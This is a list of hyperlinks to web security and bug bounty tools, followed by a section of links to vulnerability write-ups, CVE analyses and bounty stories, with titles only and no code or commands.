<a href="https://github.com/Anof-cyber/PyCript">-Pycript is a Burp Suite extension that enables users to encrypt and decrypt requests for manual and automated application penetration testing.</a>
<a href="https://github.com/root-tanishq/userefuzz">-User-Agent , X-Forwarded-For and Referer SQLI Fuzzer</a>
<a href="https://github.com/Josue87/gotator">-Gotator is a tool to generate DNS wordlists through permutations.</a>
<a href="https://github.com/michelin/ChopChop">-ChopChop is a CLI to help developers scanning endpoints and identifying exposition of sensitive services/files/folders</a>
<a href="https://portswigger.net/daily-swig/latest-web-hacking-tools-q3-2021">-Latest web hacking tools – Q3 2021</a>
<a href="https://iosiro.com/blog/baserunner-exploiting-firebase-datastores">-Introducing Baserunner: a tool for exploring and exploiting Firebase datastores</a>
<a href="https://github.com/r0075h3ll/Oralyzer">-Oralyzer, a simple python script that probes for Open Redirection vulnerability in a website. It does that by fuzzing the URL that is provided in the input</a>
<a href="https://github.com/roottusk/vapi">-vAPI is Vulnerable Adversely Programmed Interface which is Self-Hostable API that mimics OWASP API Top 10 scenarios in the means of Exercises.</a>
<a href="https://github.com/edoardottt/favirecon">-FIVERECON - Use favicon.ico to improve your target recon phase. Quickly detect technologies, WAF, exposed panels, known services.</a>
<a href="https://blog.intigriti.com/2022/03/01/hacker-tools-turbo-intruder/">-Turbo Intruder – Hacker Tools: Going faster than ever!</a>
<a href="https://gitlab.com/shodan-public/nrich">-nrich - A command-line tool to quickly analyze all IPs in a file and see which ones have open ports/ vulnerabilities. Can also be fed data from stdin to be used in a data pipeline.</a>
<a href="https://thexssrat.medium.com/what-the-fuzz-the-truth-behind-content-discovery-77cd0c0756e7">-What the fuzz?! — The truth behind content discovery</a>
<a href="https://blog.intigriti.com/2022/02/01/hacker-tools-meg/">-Meg – Hacker Tools: Endpoint scan the masses! </a>
<a href="https://hacknopedia.com/2022/08/17/must-have-browser-add-ons-or-extensions-for-bug-bounty/">-Must Have Browser Extensions for Bug Bounty</a>
<a href="https://github.com/d3mondev/puredns">-PureDNS : Subdomain bruteforcing tool that improves massdns to accurately handle wildcard subdomains and DNS poisoning. </a>
<a href="https://research.nccgroup.com/2022/08/25/tool-release-jwt-reauth/">-Tool Release – JWT-Reauth</a>
<a href="https://github.com/0xmoot/s3sec">-S3Sec - Check AWS S3 instances for read/write/delete access</a>
<a href="https://securitytrails.com/blog/uniscan">-Uniscan: An RFI, LFI, and RCE Vulnerability Scanner</a>
<a href="https://github.com/bcoles/jira_scan">-Jira Scan is a simple remote scanner for Atlassian Jira</a>
<a href="https://spaceraccoon.github.io/webpack-exploder/">-Webpack Exploder : Unpack the source code of React and other Webpacked Javascript apps! Check out Expanding the Attack Surface</a>
<a href="https://github.com/DigeeX/raider">-Raider - Web authentication testing framework</a>
<a href="https://github.com/gokulapap/Reconator">-Reconator - Automated Recon for Pentesting & Bug Bounty</a>
<a href="https://github.com/whwlsfb/Log4j2Scan">-Log4j2 RCE Passive Scanner plugin for BurpSuite</a>
<a href="https://github.com/redcode-labs/UnChain">-A tool to find redirection chains in multiple URLs</a>
<a href="https://github.com/e-m-b-a/emba">-EMBA - The firmware security analyzer</a>
<a href="https://github.com/rfc-st/humble">-A humble, and fast, security-oriented HTTP headers analyzer</a>
<a href="https://github.com/iamnihal/warf">-WARF is a Web Application Reconnaissance Framework that helps to gather information about the target.</a>
<a href="https://github.com/m3n0sd0n4ld/GooFuzz">-GooFuzz - GooFuzz is a tool to perform fuzzing with an OSINT approach, managing to enumerate directories, files, subdomains or parameters without leaving evidence on the target's server and by means of advanced Google searches (Google Dorking).</a>
<a href="https://github.com/fingerprintjs/gradejs">-GradeJS analyzes production Webpack bundles without having access to the source code of a website.</a>
<a href="https://github.com/dwisiswant0/findom-xss">-FinDOM-XSS is a tool that allows you to finding for possible and/ potential DOM based XSS vulnerability in a fast manner.</a>
<a href="https://github.com/xnl-h4ck3r/waymore">-Waymore - Find way more from the Wayback Machine!</a>
<a href="https://github.com/carlospolop/Pastos">-Pastos - Search pastes in tens of webs in seconds with GCSE.</a>
<a href="https://github.com/morphean-sec/secure-smart-contract-design-principles">-Saltzer and Schroeder's 10 secure design principles as applied to solidity smart contracts.</a>
<a href="https://portswigger.net/daily-swig/teen-hacker-scoops-4-500-bug-bounty-for-facebook-flaw-that-allowed-attackers-to-unmask-page-admins">-Teen hacker scoops $4,500 bug bounty for Facebook flaw that allowed attackers to unmask page admins</a>
<a href="https://github.com/CoolerVoid/Mosca">-Mosca - Manual search tool to find bugs like a grep unix command - Beta </a>
<a href="https://github.com/gwen001/gitlab-subdomains">-gitlab-subdomains - Find subdomains on GitLab</a>
<a href="https://portswigger.net/daily-swig/security-researcher-earns-plaudits-after-discovering-yandex-ssrf-flaw">-Security researcher earns plaudits after discovering Yandex SSRF flaw</a>
<a href="https://github.com/merttasci/csrf-poc-generator">-CSRF Generator - This html file creates a csrf poc form to any http request.</a>
<a href="https://medium.com/pentesternepal/how-i-was-able-to-reveal-page-admin-of-almost-any-page-on-facebook-5a8d68253e0c">-How I was able to reveal page admin of almost any page on Facebook</a>
<a href="https://github.com/fullhunt/log4j-scan">-A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228</a>
<a href="https://github.com/glebarez/cero">-Cero : Scrape domain names from SSL certificates of arbitrary hosts</a>
<a href="https://github.com/s0md3v/Smap">-Smap : passive Nmap like scanner built with shodan.io</a>
<a href="https://xkurtph.medium.com/shopify-plugin-bypass-using-client-side-injection-thru-api-implementation-vulnerability-710d25105c8f">-Shopify Plugin Bypass using P3 Client-side injection thru API Implementation Vulnerability</a>
<a href="https://github.com/aquasecurity/trivy">-A Simple and Comprehensive Vulnerability Scanner for Containers, Suitable for CI</a>
<a href="https://github.com/honoki/bugbounty-openvpn-socks">-Run all your bug bounty VPN profiles in parallel and expose them via multiple local SOCKS proxies.</a>
<a href="https://github.com/gfek/Lepus">-Lepus is a tool for enumerating subdomains, checking for subdomain takeovers and perform port scans - and boy, is it fast!</a>
<a href="https://github.com/elceef/subzuf">-subzuf : subzuf is a subdomain brute-force fuzzer coupled with an immensly simple but effective DNS reponse-guided algorithm.</a>
<a href="https://github.com/edoardottt/csprecon">-csprecon - Discover new target domains using Content Security Policy</a>
<a href="https://medium.com/pentesternepal/a-tale-of-zero-click-account-takeover-56b51fdbd7ae">-A tale of zero click account takeover</a>
<a href="https://github.com/iamthefrogy/frogy/">-Frogy : Using the combination of different subdomain enumeration tools and logic this script tries to identify more subdomains and TLDs in recon. </a>
<a href="https://www.cyberick.com/post/how-to-find-new-more-domains-of-a-company-recon-stuff">-How to find new/more domains of a company? - Recon Stuff</a>
<a href="https://github.com/xnl-h4ck3r/xnLinkFinder">-xnLinkFinder : A python tool used to discover endpoints for a given target </a>
<a href="https://n00b.sh/posts/aes-killer-mobile-app-demo/">-Decrypting Mobile App Traffic using AES Killer and Frida</a>
<a href="https://burpsuite.guide/blog/how-good-is-burps-api-scanning/">-How good is Burp's API Scanning?</a>
<a href="https://thexssrat.medium.com/csrf-tesguide-for-bug-bounty-hunters-d14db3462695">-CSRF Testing Guide For Bug Bounty Hunters</a>
<a href="https://github.com/MayankPandey01/BrokenLinkHijacker">-BrokenLinkHijacker(BLH) is a Fast Broken Link Hijacker Tool written in Python</a>
<a href="https://github.com/Hacker0x01/awesome-hacker-api-tools">-A collection of hacker tools using HackerOne's API</a>
<a href="https://hackerone.com/reports/414101">-Vulnerabilities in exported activity WebView</a>
<a href="https://medium.com/@Sm9l/bug-bounty-recon-horizontal-correlation-b7c81a32951a">-Bug Bounty Recon: Horizontal Correlation</a>
<a href="https://infosecwriteups.com/how-i-found-multiple-sql-injection-with-ffuf-and-sqlmap-in-a-few-minutes-2824cd4dfab">-How I Found multiple SQL Injection with FFUF and Sqlmap in a few minutes</a>
<a href="https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html">-A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution </a>
<a href="https://medium.com/@sarafsaransh321/how-i-earned-240-from-a-zero-interface-53d244a231f9">-How I earned 240$ from a Zero Interface</a>
<a href="https://medium.com/@thebugbountyhunter/review-netlas-io-for-bug-bounty-c062a87b544f">-netlas.io - a new search engine for discover, research and monitor any asset. It is so useful for your #bugbounty recon automation.</a>
<a href="https://rloura.wordpress.com/2020/12/04/reversing-flutter-for-android-wip/">-Reverse engineering Flutter for Android + Doldrums (Doldrums is a reverse engineering tool for Flutter apps)<a href ="https://github.com/rscloura/Doldrums">Tool Link = _Doldrum Tool_</a></a>
<a href="https://github.com/punk-security/secret-magpie-cli">-SecretMagpie is a secret detection tool that hunts out all the secrets hiding in ALL your repositories.</a>
<a href="https://github.com/hahwul/gee">-Gee is tool of stdin to each files and stdout. It is similar to the tee command, but there are more functions for convenience. In addition, it was written as go</a>
<a href="https://github.com/codingo/bbr">-bbr is an open source tool to aid in command line driven generation of bug bounty reports based on user provided templates.</a>
<a href="https://oweng.medium.com/introducing-packetstreamer-distributed-packet-capture-for-cloud-native-platforms-3e7f9ac57ab1">-Introducing PacketStreamer: distributed packet capture for cloud-native platforms</a>
<a href="https://blog.projectdiscovery.io/asnmap/">-Introducing ASNMap: A Golang CLI tool for speedy reconnaissance using ASN data</a>
<a href="https://github.com/dwisiswant0/go-dork">-Go Dork. The fastest dork scanner written in Go</a>
<a href="https://github.com/s0md3v/uro">-uro - declutters url lists for crawling/pentesting</a>
<a href="https://github.com/google/clusterfuzzlite">-ClusterFuzzLite - Simple continuous fuzzing that runs in CI</a>
<a href="https://github.com/carlospolop/Gorks">-Gorks : Google Dorks finally made easy to run without hiding.</a>
<a href="https://blog.grimm-co.com/2021/11/escalating-xss-to-sainthood-with-nagios.html">-Escalating XSS to Sainthood with Nagios</a>
<a href="https://github.com/mosajjal/dnsmonster">-Passive DNS Capture/Monitoring Framework</a>
<a href="https://technicalsurendra.medium.com/command-injection-all-in-one-blog-52591ad750df">-Command Injection — All in one Blog</a>
<a href="https://research.securitum.com/fail2ban-remote-code-execution/">-fail2ban – Remote Code Execution</a>
<a href="https://manasharsh.medium.com/how-gopher-works-in-escalating-ssrfs-ce6e5459b630">How Gopher works in escalating SSRFs</a>
<a href="https://github.com/dwisiswant0/ppfuzz?tag=v1.0.0">-Prototype Pollution Fuzzer</a>
<a href="https://github.com/Sachin-v3rma/Astra">-Astra finds urls, endpoints, aws buckets, api keys, tokens, etc from a given url/s</a>
<a href="https://github.com/projectdiscovery/cloudlist">-Cloudlist is a tool for listing Assets from multiple Cloud Providers</a>
<a href="https://github.com/as0ler/r2flutch">-r2flutch - tool to decrypt iOS apps using r2frida</a>
<a href="https://shahjerry33.medium.com/shodan-dorks-the-gods-eye-f224f9b3984f">-Shodan Dorks - The God’s Eye</a>
<a href="https://github.com/musana/mx-takeover">-mx-takeover focuses DNS MX records and detects misconfigured MX records.</a>
# General Writeups
<a href="https://peterjson.medium.com/miracle-one-vulnerability-to-rule-them-all-c3aed9edeea2">-Miracle - One Vulnerability To Rule Them All</a>
<A href="https://medium.com/@fcwdbrqmr/400-bounty-again-using-google-dorks-6dc8e438f017">-400$ Bounty again using Google Dorks</a>
<a href="https://portswigger.net/research/top-10-web-hacking-techniques-of-2020">-Top 10 web hacking techniques of 2020 | PortSwigger Research</a>
<a href="https://medium.com/r3d-buck3t/top-10-tips-for-burp-suite-72212d22328f">-Top 10 Tips for Burp Suite</a>
<a href="https://portswigger.net/blog/server-side-prototype-pollution-scanner">-Server-Side Prototype Pollution Scanner</a>
<a href="https://www.wiz.io/blog/hells-keychain-supply-chain-attack-in-ibm-cloud-databases-for-postgresql">-Hell’s Keychain: Supply-chain vulnerability in IBM Cloud Databases for PostgreSQL allows potential for unauthorized database access </a>
<a href="https://www.tenable.com/blog/cve-2021-41773-path-traversal-zero-day-in-apache-http-server-exploited">-CVE-2021-41773: Path Traversal Zero-Day in Apache HTTP Server Exploited</a>
<a href="https://nmochea.medium.com/gcash-vulnerability-walkthrough-697ea22f97c2">-Gcash Vulnerability Walkthrough</a>
<a href="https://terjanq.medium.com/waf-bypasses-via-0days-d4ef1f212ec">-WAF bypasses via 0days</a>
<a href="https://medium.com/@querylab/idor-and-api-keys-token-hardcode-exposed-201c73d2d667">-IDOR and API-keys🔑Token Hardcode Exposed</a>
<a href="https://blog.assetnote.io/2023/01/24/yellowfin-auth-bypass-to-rce/">-Exploiting Hardcoded Keys to achieve RCE in Yellowfin BI</a>
<a href="https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/">-Here's my story about 8 CVEs resulting in a plugin removal and more than $30,000 in bounties!</a>
<a href="https://rashahacks.com/how-i-fuzz-and-hack-api/">-How I fuzz and hack APIs?</a>
<a href="https://portswigger.net/daily-swig/prototype-pollution-like-bug-variant-discovered-in-python">-Prototype pollution-like bug variant discovered in Python</a>
<a href="https://trufflesecurity.com/blog/of-cors/index.html">-Bypass firewalls with of-CORs and typo-squatting</a>
<a href="https://securitylabs.datadoghq.com/articles/iamadmin-cloudtrail-bypass/">-AWS CloudTrail vulnerability: Undocumented API allows CloudTrail bypass</a>
<a href="https://vulncheck.com/blog/cve-2022-47966-payload">-A Different Payload for CVE-2022-47966</a>
<a href="https://medium.com/@Brian.IsMeta/difficulty-of-reproducing-old-exploits-a613da2c2143">-Difficulty of Reproducing Old Exploits (Part 1)</a>
<a href="https://medium.com/@Brian.IsMeta/difficulty-of-reproducing-old-exploits-part-two-3c2db88232e5">-Difficulty of Reproducing Old Exploits (Part 2)</a>
<a href="https://www.immersivelabs.com/blog/we-discovered-major-vulnerabilities-in-control-web-panel-heres-how-we-found-them/">-We discovered major vulnerabilities in Control Web Panel. Here’s how we found them</a>
<a href="https://srcincite.io/blog/2022/08/09/from-shared-dash-to-root-bash-pre-authenticated-rce-in-vmware-vrealize-operations-manager.html">-From Shared Dash to Root Bash :: Pre-Authenticated RCE in VMWare vRealize Operations Manager</a>
<a href="https://medium.com/@_deshine_/account-take-over-due-to-aws-cognito-misconfiguration-7b092c667ee3">-Account Take Over Due To AWS Cognito Misconfiguration</a>
<a href="https://hackerone.com/reports/1439026">-Discoverability by phone number/email restriction bypass</a>
<a href="https://www.dsecbypass.com/en/centreon-map-vulnerability/">-Centreon map vulnerability</a>
<a href="https://medium.com/@coffeeaddict_exe/500-in-5-minutes-45977e89a337">-$500 in 5 minutes</a>
<a href="https://medium.com/@poetryoflive/how-i-design-my-prefect-bug-bounty-automation-1-17d0292cbad">-How I Design My Prefect Bug Bounty Automation (Part 1)</a>
<a href="https://medium.com/@poetryoflive/how-i-design-my-prefect-bug-bounty-automation-2-f27fc5612d9f">-How I Design My Prefect Bug Bounty Automation (Part 2)</a>
<a href="https://hackerone.com/reports/1273292">-Internal Gitlab Ticket Disclosure via External Slack Channels</a>
<a href="https://labs.detectify.com/2021/09/30/10-types-web-vulnerabilities-often-missed/">-10 Types of Web Vulnerabilities that are Often Missed</a>
<a href="https://ahmdhalabi.medium.com/ultimate-reconnaissance-roadmap-for-bug-bounty-hunters-pentesters-507c9a5374d">-Ultimate Reconnaissance RoadMap for Bug Bounty Hunters & Pentesters</a>
<a href="https://www.legitsecurity.com/blog/how-to-continuously-detect-vulnerable-jenkins-plugins-to-avoid-a-software-supply-chain-attack">-How to Continuously Detect Vulnerable Jenkins Plugins to Avoid a Software Supply Chain Attack</a>
<a href="https://medium.com/@soyelmago/bypassing-a-creation-limit-on-free-accounts-a-race-condition-vulnerability-in-bug-bounty-program-33e69592d36a">-Bypassing a Creation Limit on Free Accounts: A Race Condition Vulnerability in Bug Bounty Program</a>
<a href="https://medium.com/@akashtesla/how-to-automate-your-initial-recon-and-extend-asm-using-sub-scout-a52de14a2b6a">-How to automate your initial recon and extend ASM using Sub-Scout</a>
<a href="https://omar0x01.medium.com/company-building-takeover-10a422385390">-Full Company Building Takeover</a>
<a href="https://sector7.computest.nl/post/2023-01-xar/">-Bad things come in large packages: .pkg signature verification bypass on macOS</a>
<a href="https://www.cidersecurity.io/blog/research/how-we-abused-repository-webhooks-to-access-internal-ci-systems-at-scale/">-How we Abused Repository Webhooks to Access Internal CI Systems at Scale </a>
<a href="https://www.cyberick.com/post/bypass-captcha-using-turbo-intruder-leads-to-bruteforce-attack-bug-bounty">-Bypass Captcha using Turbo Intruder leads to Bruteforce attack - Bug Bounty</a>
<a href="https://medium.com/immunefi/aurora-withdrawal-logic-error-bugfix-review-c5b4e30a9160">-Aurora Withdrawal Logic Error Bugfix Review</a>
<a href="https://blog.protekkt.com/blog/basic-webassembly-buffer-overflow-exploitation-example">-Basic WebAssembly buffer overflow exploitation</a>
<a href="https://hackerone.com/reports/1501611">-An attacker can archive and unarchive any structured scope object on HackerOne</a>
<a href="https://hackerone.com/reports/1295844">-Modify in-flight data to payment provider Smart2Pay</a>
<a href="https://arxiv.org/pdf/2110.07450.pdf">-Bugs in our Pockets: The Risks of Client-Side Scanning</a>
<a href="https://njmulsqb.engineer/2022/05/31/Hunting-Sourcemaps-On-Steroids.html">-Hunting Sourcemaps On Steroids</a>
<a href="http://ysamm.com/?p=620">-Make recruiting referrals on behalf of employees ($3000)</a>
<a href="https://blog.assetnote.io/2023/02/01/rce-in-avaya-aura/">-RCE in Avaya Aura Device Services</a>
<a href="https://jakearchibald.com/2021/cors/">-How to win at CORS</a>
<a href="https://blog.abdulrah33m.com/prototype-pollution-in-python/">-Prototype Pollution in Python</a>
<a href="https://www.wiz.io/blog/attachme-oracle-cloud-vulnerability-allows-unauthorized-cross-tenant-volume-access">-AttachMe: critical OCI vulnerability allows unauthorized access to customer cloud storage volumes </a>
<a href="https://medium.com/@noob.assassin/5k-misconfigured-reset-password-that-leads-to-account-takeover-no-user-interaction-ato-e6a36b8ef183">-Misconfigured Reset password that leads to Account Takeover (No user Interaction ATO)</>
<a href="https://yogehi.github.io/research/2023/01/04/10-cves-my-personal-thoughts-on-research-and-cves.html">-10 CVEs! My Personal Thoughts On Research And CVEs</a>
<a href="https://medium.com/@Cybervenom/story-about-escalation-of-html-injection-to-ec2-instance-credentials-leak-e2cbd7343a83">-Story about Escalation of HTML Injection to EC2 Instance credentials leak</a>
<a href="https://tutorialboy24.blogspot.com/2022/09/the-blind-exploits-to-rule-watchguard.html">-The Blind Exploits To Rule Watchguard Firewalls Vulnerabilities</a>
<a href="http://ysamm.com/?p=597">-View orders and financial reports lists for any page shop ($500)</a>
<a href="https://ddosify.com/blog/testing-the-performance-of-user-authentication-flow">-Testing the Performance of User Authentication Flow</a>
<a href="https://infosecwriteups.com/hunting-for-prototype-pollution-and-its-vulnerable-code-on-js-libraries-5bab2d6dc746">-Hunting for Prototype Pollution and it’s vulnerable code on JS libraries</a>
<a href="https://medium.com/@shakti.gtp/if-its-a-feature-let-s-abuse-it-for-750-19cfb9848d4b">-If It’s a Feature!!! Let’s Abuse It for $750</a>
<a href="https://vedanttekale20.medium.com/story-of-my-first-cash-bounty-on-hackerone-acad282ae962">-Story of my first cash bounty on hackerone</a>
<a href="https://vikaran101.medium.com/how-i-made-it-into-the-united-nations-hall-of-fame-as-i-slept-f567c90be227">-How I made it into the United Nations hall of fame as I slept</a>
<a href="https://medium.com/supakiad-s-m3ez/microsoft-bug-reports-lead-to-ranking-on-microsoft-msrc-quarterly-leaderboard-q3-2022-c6c9f70e2ccd">-Microsoft bug reports lead to ranking on Microsoft MSRC Quarterly Leaderboard (Q3 2022)</a>
<a href="https://spaceraccoon.dev/embedding-payloads-bypassing-controls-microsoft-infopath/">-Embedding Payloads and Bypassing Controls in Microsoft InfoPath</a>
<a href="https://blog.stazot.com/ssh-key-injection-google-cloud/">-SSH key injection in Google Cloud Compute Engine (Google VRP)</a>
<a href="https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/">-Breaking Bitbucket: Pre Auth Remote Command Execution (CVE-2022-36804)</a>
<a href="https://shahjerry33.medium.com/http-parameter-pollution-its-contaminated-again-95c75b0295e1">-HTTP Parameter Pollution - It’s Contaminated Again</a>
<a href="https://chaosdb.wiz.io/">-Critical Vulnerability in Microsoft Azure Cosmos DB</a>
<a href="https://www.cyberark.com/resources/threat-research-blog/inglourious-drivers-a-journey-of-finding-vulnerabilities-in-drivers">-Inglourious Drivers – A Journey of Finding Vulnerabilities in Drivers</a>
<a href="https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/">-Unusual Cache Poisoning between Akamai and S3 buckets</a>
<a href="https://medium.com/@sazouki/how-i-hacked-one-of-the-biggest-airline-in-the-world-e7810dc43791">-How I hacked one of the biggest Airline in the world</a>
<a href="https://sinsinology.medium.com/bug-bounty-short-tips-as-image-b4075523e4ef">-Bug Bounty Short Tips as image</a>
<a href="https://medium.com/pentesternepal/how-i-found-a-bug-in-apple-within-just-in-5min-d7357237d7a0">-How I found a bug in Apple within just in 5min</a>
<a href="https://blog.assetnote.io/2022/06/09/whatsup-gold-exploit/">-Chaining vulnerabilities to criticality in Progress WhatsUp Gold</a>
<a href="https://medium.com/coinmonks/a-quick-guide-to-hack-private-variables-in-solidity-b45d5acb89c0">-A Quick Guide to Hack private variables in Solidity</a>
<a href="https://medium.com/@0x4kd/google-sso-misconfiguration-leading-to-account-takeover-cf9bcf63e76e">-Google SSO misconfiguration leading to Account Takeover</a>
<a href="https://vovohelo.medium.com/how-i-found-my-first-chrome-bug-cve-2021-21210-248a21272248">-How I found my first Chrome bug</a>
<a href="https://lspace.swyx.io/p/reverse-prompt-eng">-Reverse Prompt Engineering for Fun and (no) Profit</a>
<a href="https://blog.oversecured.com/Two-weeks-of-securing-Samsung-devices-Part-2/">-The second part of discovered vulnerabilities in pre-installed apps on Samsung devices</a>
<a href="https://sneakymonkey.net/cloud-credential-abuse/">-Cloud Metadata - AWS IAM Credential Abuse</a>
<a href="https://www.youtube.com/watch?v=ZUXUz22dCiQ">-$300 Google API key leaked to Public on Live Website</a>
<a href="https://amakki.me/full-account-takeover-vulnerability-in-minecraft-f56076c8287d">-Full account takeover vulnerability in Minecraft</a>
<a href="https://redhuntlabs.com/blog/5-ways-to-exploit-a-domain-takeover-vulnerability.html">-5 Ways to Exploit a Domain Takeover Vulnerability</a>
<a href="https://sinsinology.medium.com/expect-the-unexpected-discovering-fresh-zeroday-for-bounty-d074f3175847">-Expect The Unexpected: Discovering fresh ZeroDay for Bounty</a>
<a href="https://unit42.paloaltonetworks.com/jsonwebtoken-vulnerability-cve-2022-23529/">-Disclosing a New Vulnerability in JWT Secret Poisoning (CVE-2022-23529)</a>
<a href="https://blog.sonarsource.com/securing-developer-tools-a-new-supply-chain-attack-on-php/">-Securing Developer Tools: A New Supply Chain Attack on PHP</a>
<a href="https://medium.com/@mrempy/how-i-found-a-critical-p1-bug-in-5-minutes-using-a-cellphone-bug-bounty-303ebec3edd6">-How I found a critical P1 bug in 5 minutes using a cellphone — Bug Bounty</a>
<a href="https://www.youtube.com/watch?v=zNr43-szG-s">-The DeFi Threat Model</a>
<a href="https://research.nccgroup.com/2023/03/01/making-new-connections-leveraging-cisco-anyconnect-client-to-drop-and-run-payloads/">-Making New Connections – Leveraging Cisco AnyConnect Client to Drop and Run Payloads</a>
<a href="https://rambo.codes/posts/2022-10-25-sirispy-ios-bug-allowed-apps-to-eavesdrop">-SiriSpy - iOS bug allowed apps to eavesdrop on your conversations with Siri</a>
<a href="https://haiderm.com/how-i-was-able-to-delete-13k-microsoft-translator-projects/">-How I was able to delete 13k+ Microsoft Translator projects</a>
<a href="https://hackerone-hackers.affinity.co/">-Leaked H1's Employees Email addresses,meeting info on private bug bounty program</a>
<a href="https://www.ryanpickren.com/safari-uxss">-Hacking the Apple Webcam (again)</a>
<a href="https://nakedsecurity.sophos.com/2022/08/30/javascript-bugs-aplenty-in-node-js-ecosystem-found-automatically/">-JavaScript bugs aplenty in Node.js ecosystem – found automatically</a>
<a href="https://hogarth45.medium.com/bug-bounty-fire-goals-6663a7980984">-Bug Bounty FIRE Goals</a>
<a href="https://hackerone.com/reports/1404612">-Multiple vulnerability leading to account takeover in TikTok SMB subdomain.</a>
<a href="https://tuhin1729.medium.com/story-of-my-hacking-dutch-government-46b7a3c8b75a">-Story of my hacking Dutch Government</a>
<a href="https://portswigger.net/daily-swig/gitlab-triages-bug-bounty-reported-flaws-with-latest-release">-GitLab triages bug bounty-reported flaws with latest release</a>
<a href="https://portswigger.net/research/bypassing-csp-with-dangling-iframes">-Bypassing CSP with dangling iframes </a>
<a href="https://medium.com/@Hossam.Mesbah/he-is-already-here-privileges-escalation-due-to-invalidating-current-users-148069015716">-He is already here: Privileges escalation due to invalidating current users</a>
<a href="https://portswigger.net/blog/finding-client-side-prototype-pollution-with-dom-invader">-Finding client-side prototype pollution with DOM Invader</a>
<a href="https://scribesecurity.com/blog/github-cache-poisoning/">-GitHub Cache Poisoning</a>
<a href="https://www.legitsecurity.com/blog/dos-via-software-supply-chain-innumerable-projects-exposed-to-a-markdown-library-vulnerability">-The MarkdownTime Vulnerability: How to Avoid This DoS Attack on Business Critical Services</a>
<a href="https://ysamm.com/?p=763">-Multiple bugs chained to takeover Facebook Accounts which uses Gmail.</a>
<a href="https://secret.club/2022/05/11/fuzzing-solana.html">-Earn $200K by fuzzing for a weekend: Part 1</a>
<a href="https://secret.club/2022/05/11/fuzzing-solana-2.html">-Earn $200K by fuzzing for a weekend: Part 2</a>
<a href="https://jhftss.github.io/CVE-2022-26712-The-POC-For-SIP-Bypass-Is-Even-Tweetable/">-CVE-2022-26712: The POC for SIP-Bypass Is Even Tweetable</a>
<a href="https://www.sonarsource.com/blog/openemr-remote-code-execution-in-your-healthcare-system/">-OpenEMR - Remote Code Execution in your Healthcare System</a>
<a href="https://blog.viettelcybersecurity.com/cve-2022-1040-sophos-xg-firewall-authentication-bypass/">-CVE-2022-1040 Sophos XG Firewall Authentication bypass</a>
<a href="https://spaceraccoon.dev/exploiting-icalendar-properties-enterprise-applications/">-You Have One New Appointment: Exploiting iCalendar Properties in Enterprise Applications</a>
<a href="https://maheshbasnet.medium.com/how-fuzzing-can-boost-you-bug-bounty-career-49e499900aa9">-Fuzzing for Bug Bounty Hunting</a>
<a href="https://medium.com/immunefi/hacking-the-blockchain-an-ultimate-guide-4f34b33c6e8b">-Hacking the Blockchain: An Ultimate Guide</a>
<a href="https://medium.com/@taniyatesting11/bounty-evaluation-github-15-000-us-dollars-rate-limit-d6c07d73c948">-Bounty Evaluation GitHub = $15,000 US Dollars </a>
<a href="https://starlabs.sg/blog/2022/07-gitlab-project-import-rce-analysis-cve-2022-2185/">-Gitlab Project Import RCE Analysis (CVE-2022-2185)</a>
<a href="https://curtbraz.medium.com/a-konami-code-for-vuln-chaining-combos-1a29d0a27c2a">-A Konami Code for Vuln Chaining Combos</a>
<a href="https://medium.com/@amnotacat/log4shell-in-google-1337-00-144684269bf8">-Log4shell in google $1337.00 </a>
<a href="https://hackerone.com/reports/1377748">-2 click Remote Code execution in Evernote Android</a>
<a href="https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE">-Spring cloud function SpEL RCE</a>
<a href="https://hackerone.com/reports/1679624">-Remote Command Execution via Github import</a>
<a href="https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution/">-Cacti: Unauthenticated Remote Code Execution</a>
<a href="https://blog.sonatype.com/new-0-day-spring-framework-vulnerability-confirmed">-New Spring Framework RCE Vulnerability Confirmed - What to do?</a>
<a href="https://blog.maass.xyz/spring-actuator-security-part-1-stealing-secrets-using-spring-actuators">-Spring Actuator Security, Part 1: Stealing Secrets Using Spring Actuators</a>
<a href="https://blog.maass.xyz/spring-actuator-security-part-2-finding-actuators-using-static-code-analysis-with-semgrep">-Spring Actuator Security, Part 2: Finding Actuators using Static Code Analysis with semgrep</a>
<a href="https://medium.com/@vivekkashyap0707/my-first-rce-from-n-a-to-triaged-cve-2021-3064-acdd0541c664">-My First RCE from N/A to Triaged (CVE-2021–3064)</a>
<a href="https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets/">-Gitpod remote code execution 0-day vulnerability via WebSockets</a>
<a href="https://medium.com/@omar0x01/how-i-abused-the-file-upload-function-to-get-a-high-severity-vulnerability-in-bug-bounty-7cdcf349080b">-How I abused the file upload function to get a high severity vulnerability in Bug Bounty</a>
<a href="https://shahjerry33.medium.com/rce-via-webdav-power-of-put-7e1c06c71e60">-RCE via WebDav - Power Of PUT</a>
<a href="https://bugcrowd.com/disclosures/7b175e9d-8ff0-47e3-bd33-a8b1e51aa499/http-desync-attack-request-smuggling-mass-session-hijacking">-HTTP Desync Attack (Request Smuggling) - Mass Session Hijacking</a>
<a href="https://orwaatyat.medium.com/how-i-found-multiple-bugs-on-facebook-in-1-month-and-a-part-for-my-methodology-tools-58a677a9040c">-How I Found Multiple Bugs On FaceBook In 1 Month And a Part For My Methodology & Tools</a>
<a href="https://www.halborn.com/blog/post/halborn-discovers-zero-day-impacting-dogecoin-and-280-networks">-Halborn Discovers Zero-Day Impacting Dogecoin and 280+ Networks</a>
<a href="https://speakerdeck.com/patrickwardle/youre-muted-rooted">-Local priv-esc vulnerability in Zoom (for macOS)</a>
<a href="https://tantosec.com/blog/cve-2022-41343/">-CVE-2022-41343 - RCE via Phar Deserialisation (Dompdf)</a>
<a href="https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/">-Flickr Account Takeover</a>
<a href="https://github.com/duc-nt/RCE-0-day-for-GhostScript-9.50">-RCE 0 day for GhostScript-9.50</a>
<a href="https://medium.com/@randyarios/low-hanging-fruits-on-facebook-group-room-b8d17c7ea886">-Low hanging fruits on Facebook Group Room</a>
<a href="https://hackerone.com/reports/1077136">-Denial of Service via Hyperlinks in Posts</a>
<a href="https://phoenix-sec.io/2022/06/17/Zena-CookieMonsteRCE.html">-CookieMonsteRCE - XSS to RCE Exploitation in Zena 4.2.1</a>
